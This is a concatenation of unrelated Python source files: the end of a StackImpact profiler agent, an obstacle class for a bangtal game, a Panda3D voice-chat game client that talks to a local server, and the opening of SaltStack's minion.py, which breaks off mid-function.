active_reporters.append(self.allocation_reporter) if self.block_reporter.started: active_reporters.append(self.block_reporter) if len(active_reporters) > 0: selected_reporter = active_reporters[int(math.floor(random.random() * len(active_reporters)))] if not selected_reporter.start_profiling(True, True): selected_reporter = None start_timestamp = time.time() def stop_func(): if selected_reporter: selected_reporter.stop_profiling() duration = time.time() - start_timestamp self.span_reporter.record_span(name, duration) if not self.get_option('auto_profiling'): self.config_loader.load(True) if selected_reporter: selected_reporter.report(True); self.message_queue.flush(True) self.span_active = False return Span(stop_func) def _start_profiler(self, reporter): if not self.agent_started or self.get_option('auto_profiling'): return self.span_active = True reporter.start() reporter.start_profiling(True, False) def _stop_profiler(self, reporter): if not self.agent_started or self.get_option('auto_profiling'): return reporter.stop_profiling() reporter.report(False) reporter.stop() self.message_queue.flush(False) self.span_active = False def start_cpu_profiler(self): self._start_profiler(self.cpu_reporter) def stop_cpu_profiler(self): self._stop_profiler(self.cpu_reporter) def start_allocation_profiler(self): self._start_profiler(self.allocation_reporter) def stop_allocation_profiler(self): self._stop_profiler(self.allocation_reporter) def start_block_profiler(self): self._start_profiler(self.block_reporter) def stop_block_profiler(self): self._stop_profiler(self.block_reporter) def destroy(self): if not self.agent_started: self.log('Agent has not been started') return if self.agent_destroyed: return self.config_loader.stop() self.message_queue.stop() self.frame_cache.stop() self.cpu_reporter.stop() self.allocation_reporter.stop() self.block_reporter.stop() self.error_reporter.stop() self.span_reporter.stop() self.process_reporter.stop() self.cpu_reporter.destroy() self.allocation_reporter.destroy() self.block_reporter.destroy() self.error_reporter.destroy() self.span_reporter.destroy() self.process_reporter.destroy() self.agent_destroyed = True self.log('Agent destroyed') def log_prefix(self): return '[' + datetime.datetime.now().strftime('%H:%M:%S.%f') + '] StackImpact ' + self.AGENT_VERSION + ':' def log(self, message): if self.get_option('debug'): print(self.log_prefix(), message) def print_err(self, *args, **kwargs): print(*args, file=sys.stderr, **kwargs) def error(self, message): if self.get_option('debug'): self.print_err(self.log_prefix(), message) def exception(self): if self.get_option('debug'): traceback.print_exc() def delay(self, timeout, func, *args): def func_wrapper(): try: func(*args) except Exception: self.exception() t = threading.Timer(timeout, func_wrapper, ()) t.start() return t def schedule(self, timeout, interval, func, *args): tw = TimerWraper() def func_wrapper(): start = time.time() try: func(*args) except Exception: self.exception() with tw.cancel_lock: if not tw.canceled: tw.timer = threading.Timer(abs(interval - (time.time() - start)), func_wrapper, ()) tw.timer.start() tw.timer = threading.Timer(timeout, func_wrapper, ()) tw.timer.start() return tw def run_in_thread(self, func): def func_wrapper(): try: func() except Exception: self.exception() t = threading.Thread(target=func_wrapper) t.start() return t def run_in_main_thread(self, func): if self.main_thread_func: return False self.main_thread_func = func os.kill(os.getpid(), signal.SIGUSR2) return True class TimerWraper(object): def __init__(self): self.timer = None self.cancel_lock = threading.Lock() self.canceled = False def cancel(self): with self.cancel_lock: self.canceled = True self.timer.cancel()
obstacle.py
from bangtal import * import threading import random class Obstacle(Object): def __init__(self, scene, player): super().__init__(random.choice(['images/cat1.png', 'images/cat2.png',\ 'images/cat3.png', 'images/cat4.png', 'images/dog1.png',\ 'images/dog2.png','images/dog3.png', 'images/dog4.png'])) self.scene = scene self.x = 1000 self.y = random.choice([150, 300, 450]) self.locate(scene, self.x, self.y) self.setScale(0.45) self.show() self.end = False self.speed = 5.0 self.player = player def start(self): self.t = threading.Thread(target=self.move) self.t.daemon = True self.t.start() def move(self): self.timer1 = Timer(int(10 / self.speed)) self.timer1.onTimeout = self.onTimeOut self.timer1.start() currentTime = self.timer1.get() while not self.scene.isCollision: time2 = self.timer1.get() if (currentTime - time2) > (1 / (self.speed * 10)): currentTime = time2 self.x -= (10 * self.speed) self.locate(self.scene, int(self.x), self.y) if self.x < 100: if self.player.y == self.y: print("collision") showMessage("Game End!") self.scene.isCollision = True self.timer1.onTimeout() if self.x < 0: break self.timer1.onTimeout() def onTimeOut(self): self.y = -1 self.hide() del self return
__init__.py
#Server code adapted from optional lectures from panda3d.core import * from direct.showbase.ShowBase import ShowBase import sys, math, os, random from direct.gui.OnscreenText import OnscreenText from direct.interval.IntervalGlobal import * from direct.interval.LerpInterval import * from direct.gui.DirectGui import * from direct.task.Task import Task import time from Listener.ListenerManager import * from Listener.VolumeReader import * from threading import Thread from Graphics.Word import * from Graphics.CloudManager import * from Graphics.SceneManager import * from Database.DatabaseManager import * from Graphics.MenuBobble import * from Utils.StringHelper import * import socket import threading from queue import Queue import copy import time import datetime import random server = None class Struct(object): pass data = Struct() def runGame(): global data initializeConstants() initializeVariables() loginScreen() setupLighting(render) startTasks() base.run() #connects to server def connectToServer(): global server HOST = "localhost" PORT = 50011 server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.connect((HOST,PORT)) print("Connected to server!") #handles server messages def handleServerMsg(server, serverMsg): server.setblocking(1) msg = "" command = "" while True: msg += server.recv(10).decode("UTF-8") command = msg.split("\n") while (len(command) > 1): readyMsg = command[0] msg = "\n".join(command[1:]) serverMsg.put(readyMsg) command = msg.split("\n") #sets up default values def initializeVariables(): global data data.activeScreen3d = render.attachNewNode("activescreen") data.activeScreen2d = aspect2d.attachNewNode("activescreen") data.buttonScreen = render.attachNewNode("buttons") data.micIndex = None data.otherPlayers = dict() clearPersonalData() #clears all data thats important per player def clearPersonalData(): global data data.state = "" data.myName = "" data.friend = "" data.transcript = [] data.words = [] data.friendButton = None data.buttons = [] data.ringtone = None data.music = None #stores important locations def initializeConstants(): global data data.centerScreenPos = (.35, 0, .1) data.logoutButtonLoc = (-.4, 1.1, -.25) data.menuButtonLoc = data.logoutButtonLoc data.friendButtonLoc = (-.1, 1.1, -.25) #loads clouds and scene def loadModels(): global data loadClouds(data.activeScreen3d) loadBackground(data.activeScreen3d) #music from https://www.youtube.com/watch?v=1ZYbU82GVz4&t=622s def loadMusic(): global data data.music = base.loader.loadSfx("Graphics/sounds/relaxing.ogg") data.music.play() #starts all tasks to run in background def startTasks(): newWordTimer = .8 moveCloudTimer = .02 updateTimer = .2 taskMgr.doMethodLater(updateTimer, update, "update") taskMgr.doMethodLater(newWordTimer, getNewWord, "word") taskMgr.doMethodLater(moveCloudTimer, moveClouds, "cloud") #Updates the display and gets new words def update(task): while (serverMsg.qsize() > 0): msg = serverMsg.get(False) try: msg = msg.split() command = msg[0] global data if(command== "myIDis"): pass elif(command == "myMicIs"): data.micIndex = int(msg[1]) elif(command == "newPlayer"): pass elif(command == "loginEvent"): playerName = msg[2] if(playerName!=data.myName): data.otherPlayers[playerName] = list() if(data.state=="menu"): updateMenu() elif(command == "logoffEvent"): playerName = msg[2] if(playerName!=data.myName): if(playerName in data.otherPlayers): del data.otherPlayers[playerName] if(data.state=="menu"): updateMenu() elif(data.state== "inCall"): if(data.friend == playerName): data.friend = "" stopListener() goBackToMenu() elif(command == "tryDial"): if(data.state=="menu"): player1 = msg[2] player2 = msg[3] if(player1 == data.myName): dialingMenu(data.myName, player2) elif(player2 == data.myName): acceptMenu(data.myName, player1) elif(command == "acceptCall"): player1 = msg[2] player2 = msg[3] if(data.myName == player1 or data.myName == player2): dialFriend() elif(command == "declineCall"): player1 = msg[2] player2 = msg[3] if(data.myName==player1 or data.myName == player2): data.friend = None goBackToMenu() elif(command == "newWord"): if(data.state=="inCall"): label = msg[2] playerName = msg[3] if(data.myName==playerName or data.friend ==playerName): (x,y,z) = (8, 35, 10) color = "red" textLine = data.friend + ": " + label if(playerName ==data.myName): x = -8 color = "blue" textLine = data.myName + ": " + label data.transcript.append(textLine) newWord = Word(playerName, data.activeScreen3d, x, y, z, label, color, server) data.otherPlayers[playerName].append(newWord) elif(command == "moveWord"): if(data.state=="inCall"): label = msg[2] playerName = msg[3] for word in data.otherPlayers[playerName]: if(word.getText()==label): word.throwWord() except: print(msg) print("failed") serverMsg.task_done() return task.cont #grabs words from listenermanager def getNewWord(task): global data global phrases if(phrases.empty()==False): label = phrases.get() msg = "newWord %s %s\n" % (label, data.myName) server.send(msg.encode()) for player in data.otherPlayers: newWordList = [] for word in data.otherPlayers[player]: if(word.move()): newWordList.append(word) data.otherPlayers[player] = newWordList return task.again def createLogoutButton(): global data (cx, cy, cz) = data.logoutButtonLoc co = clickableOption(cx, cy, cz, "Logout", goBackToLogin, data.buttonScreen) data.buttons.append(co) def createMenuButton(): global data (cx, cy, cz) = data.menuButtonLoc co = clickableOption(cx, cy, cz, "Menu", goBackToMenu, data.buttonScreen) data.buttons.append(co) def removeFriendButton(): global data if(data.friendButton!=None): data.friendButton.destroy() data.friendButton.getObj().removeNode() def createAddFriendButton(): global data removeFriendButton() if(data.friend in getFriends(data.myName)): text = "UnFriend" color = "red" else: text = "Friend" color = "green" (cx, cy, cz) = data.friendButtonLoc co = clickableOption(cx, cy, cz, text, toggleFriend, data.buttonScreen, color) data.friendButton = co #toggles whether to add/remove a friend def toggleFriend(): global data if(data.friend in getFriends(data.myName)): removeFriend(data.myName, data.friend) else: addFriend(data.myName, data.friend) createAddFriendButton() def goBackToLogin(): global data if(data.myName!=""): userLogOff() loginScreen() def goBackToMenu(tmp=None): global data data.state = "menu" updateMenu() loadMusic() def loadPlayerName(activeScreen, name): createTextAt(1.3, 0, -.9, name, activeScreen) def loginScreen(): global data clearScreen() clearPersonalData() data.state = "login" loadMusic() setupMenuBackground(data.activeScreen3d) (cx, cy, cz) = data.centerScreenPos createTextAt(cx, cy, cz, "What's your name?", data.activeScreen2d) entry = DirectEntry(text = "", scale=.2, command=passwordScreen, initialText="", numLines = 2, focus=1, frameSize = (-1.0,0,0,0)) entry.setPos(-.2,0,-.1) entry.reparentTo(data.activeScreen2d) def passwordScreen(playerName, attempts = 0): global data clearScreen() setupMenuBackground(data.activeScreen3d) (cx, cy, cz) = data.centerScreenPos (shiftedX, shiftedY, shiftedZ) = (-.55, 0, -.3) wrongNodePath = None if(attempts!=0): createTextAt(-.3, 0, -.2, "X", data.activeScreen2d, "red") data.state = "password" entry = DirectEntry(text = "", scale=.2, command=menuScreen, extraArgs = [playerName], obscured=1, initialText="", numLines = 2, focus=1, frameSize = (-1.0,0,0,0)) entry.setPos(cx + shiftedX, cy + shiftedY, cz + shiftedZ) entry.reparentTo(data.activeScreen2d) if(isTracked(playerName)==False): toDisplay = "New player!\nEnter a new password: \n" else: toDisplay = "Welcome back!\nEnter your password: \n" loadPlayerName(data.activeScreen2d, playerName) createTextAt(cx, cy, cz + .1, toDisplay, data.activeScreen2d) createLogoutButton() def menuScreen(input, playerName): global data if(isTracked(playerName)==False): newPlayer(playerName, input) if(doPasswordsMatch(input, getStoredPassword(playerName))==False): passwordScreen(playerName, 1) return data.otherPlayers[playerName] = list() data.myName= playerName data.state="menu" msg = "loginEvent %s\n" % data.myName server.send(msg.encode()) setOnlineStatus(data.myName, True) def updateMenu(): global data clearScreen() stopRinging() setupMenuBackground(data.activeScreen3d) toDisplay = "Online Players:" online = getOnlinePlayers() space = 0 (cx, cy, cz) = data.centerScreenPos if(len(online)==1): toDisplay+= "\nNo players online!" for player in online: if(player == data.myName): continue color = "blue" if(player in getFriends(data.myName)): color = "green" co = PlayerGraphic(-.2 + space, 2, -.2, player, data.myName, server, data.activeScreen3d, color) data.buttons.append(co) space += .2 loadPlayerName(data.activeScreen2d, data.myName) createTextAt(cx, cy, cz, toDisplay, data.activeScreen2d) createLogoutButton() def acceptMenu(playerName, friend): global data data.state = "calling" data.friend = friend print("Incoming call!") clearScreen() stopMusic() createTextAt(.4,1,.2, "Incoming call from\n" + friend, data.activeScreen2d) setupMenuBackground(data.activeScreen3d) loadPlayerName(data.activeScreen2d, playerName) co1 = clickableOption(.2, 1.1, -.2, "Decline", declineCall, data.buttonScreen, "red") co2 = clickableOption(-.1, 1.1, -.2, "Accept", acceptCall, data.buttonScreen, "green") data.buttons.append(co1) data.buttons.append(co2) #ringtone http://soundbible.com/1407-Phone-Ringing.html data.ringtone = base.loader.loadSfx("Graphics/sounds/ringtone.ogg") data.ringtone.play() def dialingMenu(playerName, friend): global data data.state = "calling" data.friend = friend print("Dialing!") clearScreen() stopMusic() setupMenuBackground(data.activeScreen3d) loadPlayerName(data.activeScreen2d, playerName) co = clickableOption(.2, 1.1, -.2, "Hangup", declineCall, data.buttonScreen, "red") data.buttons.append(co) createTextAt(.4, 1, .2, "Calling " + friend, data.activeScreen2d) def dialFriend(): global data data.state = "inCall" clearScreen() stopRinging() initializeListener(data.micIndex) loadPrettyLayout(data.myName, data.friend, data.activeScreen2d) createGravity() co = clickableOption(-.25, 1.1, -.25, "Transcript", downloadTranscript, data.buttonScreen, "blue") data.buttons.append(co) loadModels() (x,y,z) = data.menuButtonLoc co = clickableOption(x, y, z, "Hangup", declineCall, data.buttonScreen, "red") data.buttons.append(co) createAddFriendButton() loadPlayerName(data.activeScreen2d, data.myName) def acceptCall(): global data msg = "acceptCall %s %s\n" % (data.myName, data.friend) server.send(msg.encode()) def declineCall(): global data msg = "declineCall %s %s\n" % (data.myName, data.friend) server.send(msg.encode()) def stopRinging(): global data if(data.ringtone!=None): data.ringtone.stop() data.ringtone = None def stopMusic(): global data if(data.music!=None): data.music.stop() data.music = None #ping sound from http://soundbible.com/2018-Plop.html def clearScreen(): ping = base.loader.loadSfx("Graphics/sounds/ping.ogg") ping.setVolume(.3) ping.play() global data for button in data.buttons: button.destroy() data.buttons = [] for path in data.buttonScreen.getChildren(): path.removeNode() for path in data.activeScreen3d.getChildren(): path.removeNode() for path in data.activeScreen2d.getChildren(): path.removeNode() def userLogOff(): global data msg = "logoffEvent %s\n" % data.myName server.send(msg.encode()) data.state = "logoff" setOnlineStatus(data.myName, False) stopListener() def downloadTranscript(): ts = time.time() fileName = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H-%M-%S') path = os.environ["HOMEPATH"] + os.sep + "Desktop" + os.sep + fileName + ".txt" f = open(path,"w+") for line in data.transcript: f.write(line + "\n") f.close() def setupWindow(): wp = WindowProperties() wp.setSize(1920, 1080) wp.setTitle("ChatWorld") base.win.requestProperties(wp) base.disableMouse() if __name__ == "__main__": connectToServer() base.exitFunc = userLogOff setupWindow() serverMsg = Queue(100) threading.Thread(target = handleServerMsg, args = (server, serverMsg)).start() runGame()
minion.py
# -*- coding: utf-8 -*- ''' Routines to set up a minion ''' # Import python libs from __future__ import absolute_import, print_function, with_statement, unicode_literals import functools import os import sys import copy import time import types import signal import random import logging import threading import traceback import contextlib import multiprocessing from random import randint, shuffle from stat import S_IMODE import salt.serializers.msgpack from binascii import crc32 # Import Salt Libs # pylint: disable=import-error,no-name-in-module,redefined-builtin from salt.ext import six from salt.ext.six.moves import range from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO import salt.transport.client import salt.defaults.exitcodes from salt.utils.ctx import RequestContext # pylint: enable=no-name-in-module,redefined-builtin import tornado HAS_PSUTIL = False try: import salt.utils.psutil_compat as psutil HAS_PSUTIL = True except ImportError: pass HAS_RESOURCE = False try: import resource HAS_RESOURCE = True except ImportError: pass try: import zmq.utils.monitor HAS_ZMQ_MONITOR = True except ImportError: HAS_ZMQ_MONITOR = False try: import salt.utils.win_functions HAS_WIN_FUNCTIONS = True except ImportError: HAS_WIN_FUNCTIONS = False # pylint: enable=import-error # Import salt libs import salt import salt.client import salt.crypt import salt.loader import salt.beacons import salt.engines import salt.payload import salt.pillar import salt.syspaths import salt.utils.args import salt.utils.context import salt.utils.data import salt.utils.error import salt.utils.event import salt.utils.files import salt.utils.jid import salt.utils.minion import salt.utils.minions import salt.utils.network import salt.utils.platform import salt.utils.process import salt.utils.schedule import salt.utils.ssdp import salt.utils.user import salt.utils.zeromq import salt.defaults.events import salt.defaults.exitcodes import salt.cli.daemons import salt.log.setup import salt.utils.dictupdate from salt.config import DEFAULT_MINION_OPTS from salt.defaults import DEFAULT_TARGET_DELIM from salt.utils.debug import enable_sigusr1_handler from salt.utils.event import tagify from salt.utils.odict import OrderedDict from salt.utils.process import (default_signals, SignalHandlingMultiprocessingProcess, ProcessManager) from salt.exceptions import ( CommandExecutionError, CommandNotFoundError, SaltInvocationError, SaltReqTimeoutError, SaltClientError, SaltSystemExit, SaltDaemonNotRunning, SaltException, SaltMasterUnresolvableError ) import tornado.gen # pylint: disable=F0401 import tornado.ioloop # pylint: disable=F0401 log = logging.getLogger(__name__) # To set up a minion: # 1. Read in the configuration # 2. Generate the function mapping dict # 3. Authenticate with the master # 4. Store the AES key # 5. Connect to the publisher # 6. Handle publications def resolve_dns(opts, fallback=True): ''' Resolves the master_ip and master_uri options ''' ret = {} check_dns = True if (opts.get('file_client', 'remote') == 'local' and not opts.get('use_master_when_local', False)): check_dns = False # Since salt.log is imported below, salt.utils.network needs to be imported here as well import salt.utils.network if check_dns is True: try: if opts['master'] == '': raise SaltSystemExit ret['master_ip'] = salt.utils.network.dns_check( opts['master'], int(opts['master_port']), True, opts['ipv6'], attempt_connect=False) except SaltClientError: retry_dns_count = opts.get('retry_dns_count', None) if opts['retry_dns']: while True: if retry_dns_count is not None: if retry_dns_count == 0: raise SaltMasterUnresolvableError retry_dns_count -= 1 import salt.log msg = ('Master hostname: \'{0}\' not found or not responsive. ' 'Retrying in {1} seconds').format(opts['master'], opts['retry_dns']) if salt.log.setup.is_console_configured(): log.error(msg) else: print('WARNING: {0}'.format(msg)) time.sleep(opts['retry_dns']) try: ret['master_ip'] = salt.utils.network.dns_check( opts['master'], int(opts['master_port']), True, opts['ipv6'], attempt_connect=False) break except SaltClientError: pass else: if fallback: ret['master_ip'] = '127.0.0.1' else: raise except SaltSystemExit: unknown_str = 'unknown address' master = opts.get('master', unknown_str) if master == '': master = unknown_str if opts.get('__role') == 'syndic': err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \ 'Set \'syndic_master\' value in minion config.'.format(master) else: err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \ 'Set \'master\' value in minion config.'.format(master) log.error(err) raise SaltSystemExit(code=42, msg=err) else: ret['master_ip'] = '127.0.0.1' if 'master_ip' in ret and 'master_ip' in opts: if ret['master_ip'] != opts['master_ip']: log.warning( 'Master ip address changed from %s to %s', opts['master_ip'], ret['master_ip'] ) if opts['source_interface_name']: log.trace('Custom source interface required: %s', opts['source_interface_name']) interfaces = salt.utils.network.interfaces() log.trace('The following interfaces are available on this Minion:') log.trace(interfaces) if opts['source_interface_name'] in interfaces: if interfaces[opts['source_interface_name']]['up']: addrs = interfaces[opts['source_interface_name']]['inet'] if not opts['ipv6'] else\ interfaces[opts['source_interface_name']]['inet6'] ret['source_ip'] = addrs[0]['address'] log.debug('Using %s as source IP address', ret['source_ip']) else: log.warning('The interface %s is down so it cannot be used as source to connect to the Master', opts['source_interface_name']) else: log.warning('%s is not a valid interface. Ignoring.', opts['source_interface_name']) elif opts['source_address']: ret['source_ip'] = salt.utils.network.dns_check( opts['source_address'], int(opts['source_ret_port']), True, opts['ipv6'], attempt_connect=False) log.debug('Using %s as source IP address', ret['source_ip']) if opts['source_ret_port']: ret['source_ret_port'] = int(opts['source_ret_port']) log.debug('Using %d as source port for the ret server', ret['source_ret_port']) if opts['source_publish_port']: ret['source_publish_port'] = int(opts['source_publish_port']) log.debug('Using %d as source port for the master pub', ret['source_publish_port']) ret['master_uri'] = 'tcp://{ip}:{port}'.format( ip=ret['master_ip'], port=opts['master_port']) log.debug('Master URI: %s', ret['master_uri']) return ret def prep_ip_port(opts): ret = {} # Use given master IP if "ip_only" is set or if master_ip is an ipv6 address without # a port specified. The is_ipv6 check returns False if brackets are used in the IP # definition such as master: '[::1]:1234'. if opts['master_uri_format'] == 'ip_only' or salt.utils.network.is_ipv6(opts['master']): ret['master'] = opts['master'] else: ip_port = opts['master'].rsplit(':', 1) if len(ip_port) == 1: # e.g. master: mysaltmaster ret['master'] = ip_port[0] else: # e.g. master: localhost:1234 # e.g. master: 127.0.0.1:1234 # e.g. master: [::1]:1234 # Strip off brackets for ipv6 support ret['master'] = ip_port[0].strip('[]') # Cast port back to an int! Otherwise a TypeError is thrown # on some of the socket calls elsewhere in the minion and utils code. ret['master_port'] = int(ip_port[1]) return ret def get_proc_dir(cachedir, **kwargs): ''' Given the cache directory, return the directory that process data is stored in, creating it if it doesn't exist. The following optional Keyword Arguments are handled: mode: which is anything os.makedir would accept as mode. uid: the uid to set, if not set, or it is None or -1 no changes are made. Same applies if the directory is already owned by this uid. Must be int. Works only on unix/unix like systems. gid: the gid to set, if not set, or it is None or -1 no changes are made. Same applies if the directory is already owned by this gid. Must be int. Works only on unix/unix like systems. ''' fn_ = os.path.join(cachedir, 'proc') mode = kwargs.pop('mode', None) if mode is None: mode = {} else: mode = {'mode': mode} if not os.path.isdir(fn_): # proc_dir is not present, create it with mode settings os.makedirs(fn_, **mode) d_stat = os.stat(fn_) # if mode is not an empty dict then we have an explicit # dir mode. So lets check if mode needs to be changed. if mode: mode_part = S_IMODE(d_stat.st_mode) if mode_part != mode['mode']: os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode']) if hasattr(os, 'chown'): # only on unix/unix like systems uid = kwargs.pop('uid', -1) gid = kwargs.pop('gid', -1) # if uid and gid are both -1 then go ahead with # no changes at all if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \ [i for i in (uid, gid) if i != -1]: os.chown(fn_, uid, gid) return fn_ def load_args_and_kwargs(func, args, data=None, ignore_invalid=False): ''' Detect the args and kwargs that need to be passed to a function call, and check them against what was passed. ''' argspec = salt.utils.args.get_function_argspec(func) _args = [] _kwargs = {} invalid_kwargs = [] for arg in args: if isinstance(arg, dict) and arg.pop('__kwarg__', False) is True: # if the arg is a dict with __kwarg__ == True, then its a kwarg for key, val in six.iteritems(arg): if argspec.keywords or key in argspec.args: # Function supports **kwargs or is a positional argument to # the function. _kwargs[key] = val else: # **kwargs not in argspec and parsed argument name not in # list of positional arguments. This keyword argument is # invalid. invalid_kwargs.append('{0}={1}'.format(key, val)) continue else: string_kwarg = salt.utils.args.parse_input([arg], condition=False)[1] # pylint: disable=W0632 if string_kwarg: if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args: # Function supports **kwargs or is a positional argument to # the function. _kwargs.update(string_kwarg) else: # **kwargs not in argspec and parsed argument name not in # list of positional arguments. This keyword argument is # invalid. for key, val in six.iteritems(string_kwarg): invalid_kwargs.append('{0}={1}'.format(key, val)) else: _args.append(arg) if invalid_kwargs and not ignore_invalid: salt.utils.args.invalid_kwargs(invalid_kwargs) if argspec.keywords and isinstance(data, dict): # this function accepts **kwargs, pack in the publish data for key, val in six.iteritems(data): _kwargs['__pub_{0}'.format(key)] = val return _args, _kwargs def eval_master_func(opts): ''' Evaluate master function if master type is 'func' and save it result in opts['master'] ''' if '__master_func_evaluated' not in opts: # split module and function and try loading the module mod_fun = opts['master'] mod, fun = mod_fun.split('.') try: master_mod = salt.loader.raw_mod(opts, mod, fun) if not master_mod: raise KeyError # we take whatever the module returns as master address opts['master'] = master_mod[mod_fun]() # Check for valid types if not isinstance(opts['master'], (six.string_types, list)): raise TypeError opts['__master_func_evaluated'] = True except KeyError: log.error('Failed to load module %s', mod_fun) sys.exit(salt.defaults.exitcodes.EX_GENERIC) except TypeError: log.error('%s returned from %s is not a string', opts['master'], mod_fun) sys.exit(salt.defaults.exitcodes.EX_GENERIC) log.info('Evaluated master from module: %s', mod_fun) def master_event(type, master=None): ''' Centralized master event function which will return event type based on event_map ''' event_map = {'connected': '__master_connected', 'disconnected': '__master_disconnected', 'failback': '__master_failback', 'alive': '__master_alive'} if type == 'alive' and master is not None: return '{0}_{1}'.format(event_map.get(type), master) return event_map.get(type, None) def service_name(): ''' Return the proper service name based on platform ''' return 'salt_minion' if 'bsd' in sys.platform else 'salt-minion' class MinionBase(object): def __init__(self, opts): self.opts = opts @staticmethod def process_schedule(minion, loop_interval): try: if hasattr(minion, 'schedule'): minion.schedule.eval() else: log.error('Minion scheduler not initialized. Scheduled jobs will not be run.') return # Check if scheduler requires lower loop interval than # the loop_interval setting if minion.schedule.loop_interval < loop_interval: loop_interval = minion.schedule.loop_interval log.debug( 'Overriding loop_interval because of scheduled jobs.' ) except Exception as exc: log.error('Exception %s occurred in scheduled job', exc) return loop_interval def process_beacons(self, functions): ''' Evaluate all of the configured beacons, grab the config again in case the pillar or grains changed ''' if 'config.merge' in functions: b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True) if b_conf: return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member return [] @tornado.gen.coroutine def eval_master(self, opts, timeout=60, safe=True, failed=False, failback=False): ''' Evaluates and returns a tuple of the current master address and the pub_channel. In standard mode, just creates a pub_channel with the given master address. With master_type=func evaluates the current master address from the given module and then creates a pub_channel. With master_type=failover takes the list of masters and loops through them. The first one that allows the minion to create a pub_channel is then returned. If this function is called outside the minions initialization phase (for example from the minions main event-loop when a master connection loss was detected), 'failed' should be set to True. The current (possibly failed) master will then be removed from the list of masters. ''' # return early if we are not connecting to a master if opts['master_type'] == 'disable': log.warning('Master is set to disable, skipping connection') self.connected = False raise tornado.gen.Return((None, None)) # Run masters discovery over SSDP. This may modify the whole configuration, # depending of the networking and sets of masters. # if we are using multimaster, discovery can only happen at start time # because MinionManager handles it. by eval_master time the minion doesn't # know about other siblings currently running if isinstance(self.opts['discovery'], dict) and not self.opts['discovery'].get('multimaster'): self._discover_masters() # check if master_type was altered from its default if opts['master_type'] != 'str' and opts['__role'] != 'syndic': # check for a valid keyword if opts['master_type'] == 'func': eval_master_func(opts) # if failover or distributed is set, master has to be of type list elif opts['master_type'] in ('failover', 'distributed'): if isinstance(opts['master'], list): log.info( 'Got list of available master addresses: %s', opts['master'] ) if opts['master_type'] == 'distributed': master_len = len(opts['master']) if master_len > 1: secondary_masters = opts['master'][1:] master_idx = crc32(opts['id']) % master_len try: preferred_masters = opts['master'] preferred_masters[0] = opts['master'][master_idx] preferred_masters[1:] = [m for m in opts['master'] if m != preferred_masters[0]] opts['master'] = preferred_masters log.info('Distributed to the master at \'%s\'.', opts['master'][0]) except (KeyError, AttributeError, TypeError): log.warning('Failed to distribute to a specific master.') else: log.warning('master_type = distributed needs more than 1 master.') if opts['master_shuffle']: log.warning( 'Use of \'master_shuffle\' detected. \'master_shuffle\' is deprecated in favor ' 'of \'random_master\'. Please update your minion config file.' ) opts['random_master'] = opts['master_shuffle'] opts['auth_tries'] = 0 if opts['master_failback'] and opts['master_failback_interval'] == 0: opts['master_failback_interval'] = opts['master_alive_interval'] # if opts['master'] is a str and we have never created opts['master_list'] elif isinstance(opts['master'], six.string_types) and ('master_list' not in opts): # We have a string, but a list was what was intended. Convert. # See issue 23611 for details opts['master'] = [opts['master']] elif opts['__role'] == 'syndic': log.info('Syndic setting master_syndic to \'%s\'', opts['master']) # if failed=True, the minion was previously connected # we're probably called from the minions main-event-loop # because a master connection loss was detected. remove # the possibly failed master from the list of masters. elif failed: if failback: # failback list of masters to original config opts['master'] = opts['master_list'] else: log.info( 'Moving possibly failed master %s to the end of ' 'the list of masters', opts['master'] ) if opts['master'] in opts['local_masters']: # create new list of master with the possibly failed # one moved to the end failed_master = opts['master'] opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x] opts['master'].append(failed_master) else: opts['master'] = opts['master_list'] else: msg = ('master_type set to \'failover\' but \'master\' ' 'is not of type list but of type ' '{0}'.format(type(opts['master']))) log.error(msg) sys.exit(salt.defaults.exitcodes.EX_GENERIC) # If failover is set, minion have to failover on DNS errors instead of retry DNS resolve. # See issue 21082 for details if opts['retry_dns'] and opts['master_type'] == 'failover': msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. ' 'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.') log.critical(msg) opts['retry_dns'] = 0 else: msg = ('Invalid keyword \'{0}\' for variable ' '\'master_type\''.format(opts['master_type'])) log.error(msg) sys.exit(salt.defaults.exitcodes.EX_GENERIC) # FIXME: if SMinion don't define io_loop, it can't switch master see #29088 # Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop # (The channel factories will set a default if the kwarg isn't passed) factory_kwargs = {'timeout': timeout, 'safe': safe} if getattr(self, 'io_loop', None): factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member tries = opts.get('master_tries', 1) attempts = 0 # if we have a list of masters, loop through them and be # happy with the first one that allows us to connect if isinstance(opts['master'], list): conn = False last_exc = None opts['master_uri_list'] = [] opts['local_masters'] = copy.copy(opts['master']) # shuffle the masters and then loop through them if opts['random_master']: # master_failback is only used when master_type is set to failover if opts['master_type'] == 'failover' and opts['master_failback']: secondary_masters = opts['local_masters'][1:] shuffle(secondary_masters) opts['local_masters'][1:] = secondary_masters else: shuffle(opts['local_masters']) # This sits outside of the connection loop below because it needs to set # up a list of master URIs regardless of which masters are available # to connect _to_. This is primarily used for masterless mode, when # we need a list of master URIs to fire calls back to. for master in opts['local_masters']: opts['master'] = master opts.update(prep_ip_port(opts)) opts['master_uri_list'].append(resolve_dns(opts)['master_uri']) while True: if attempts != 0: # Give up a little time between connection attempts # to allow the IOLoop to run any other scheduled tasks. yield tornado.gen.sleep(opts['acceptance_wait_time']) attempts += 1 if tries > 0: log.debug( 'Connecting to master. Attempt %s of %s', attempts, tries ) else: log.debug( 'Connecting to master. Attempt %s (infinite attempts)', attempts ) for master in opts['local_masters']: opts['master'] = master opts.update(prep_ip_port(opts)) opts.update(resolve_dns(opts)) # on first run, update self.opts with the whole master list # to enable a minion to re-use old masters if they get fixed if 'master_list' not in opts: opts['master_list'] = copy.copy(opts['local_masters']) self.opts = opts pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs) try: yield pub_channel.connect() conn = True break except SaltClientError as exc: last_exc = exc if exc.strerror.startswith('Could not access'): msg = ( 'Failed to initiate 